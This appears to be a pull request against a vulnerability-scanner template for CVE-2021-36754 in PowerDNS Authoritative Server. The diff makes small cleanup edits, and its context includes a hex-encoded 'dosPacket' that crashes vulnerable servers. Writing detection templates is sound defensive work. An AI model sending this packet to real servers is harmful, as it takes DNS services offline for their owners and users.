### PR TITLE
Add CVE-2021-36754 (vKEV)

### DIFF
--- a/javascript/cves/2021/CVE-2021-36754.yaml
+++ b/javascript/cves/2021/CVE-2021-36754.yaml
@@ -39,7 +39,7 @@ javascript:
       let conn;
       let isPowerdns = false;
       let isUp = false;
-  
+
       let validPacket = "1ea0012000010000000000010776657273696f6e0462696e64000010000300002904d000000000000c000a00089f750bc0808677d1";
       let dosPacket = "296e01200001000000000001046f617374026d6500ffff000100002904d000000000000c000a000805dbdf1a40effcf4";
 
@@ -47,7 +47,6 @@ javascript:
       conn = c.Open('udp', `${Host}:${Port}`);
       conn.SendHex(validPacket);
       const result = conn.RecvString();
-      log(result);
 
       if (result.includes("PowerDNS Authoritative Server")) {
         isPowerdns = true;


### PR DESCRIPTION
### PR Information

PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)